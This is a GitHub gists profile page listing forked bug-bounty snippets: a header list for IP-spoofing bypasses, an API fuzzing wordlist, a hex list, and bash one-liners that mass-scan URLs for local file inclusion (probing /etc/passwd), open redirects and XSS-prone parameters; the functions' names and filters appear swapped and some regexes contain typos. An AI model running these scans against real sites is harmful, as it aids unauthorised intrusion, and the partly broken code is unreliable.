Skip to content

Instantly share code, notes, and snippets.

View BlasterX24's full-sized avatar
💗
I may be slow to respond.

Umesh Paytode BlasterX24

💗
I may be slow to respond.
View GitHub Profile
@BlasterX24
BlasterX24 / headers.txt
Created October 2, 2021 04:30 — forked from R0X4R/headers.txt
Updated
X-Forwarded-For:
X-Originally-Forwarded-For:
X-Originating-Ip:
X-Originating:
True-Client-IP:
Referer:
X-WAP-Profile:
Host:
From:
X-Original-URL: http://
@BlasterX24
BlasterX24 / List of API endpoints & objects
Created September 17, 2021 08:57 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@BlasterX24
BlasterX24 / hex_00_to_FF
Created September 10, 2021 05:16 — forked from BuffaloWill/hex_00_to_FF
hex 00 to FF
00
01
02
03
04
05
06
07
08
09
@BlasterX24
BlasterX24 / bash_aliases.sh
Created August 17, 2020 04:58 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf redirect | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf lfi | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Assembly Language / Reversing / Malware Analysis -resources

Twitter: Muffin

⭐Assembly Language

Keybase proof

I hereby claim:

  • I am blasterx24 on github.
  • I am blasterx24 (https://keybase.io/blasterx24) on keybase.
  • I have a public key ASDn-qKzE930aMDEOEj93qtmfu5ApXzZuj4jQfXuT_Ws-Ao

To claim this, I am signing this object: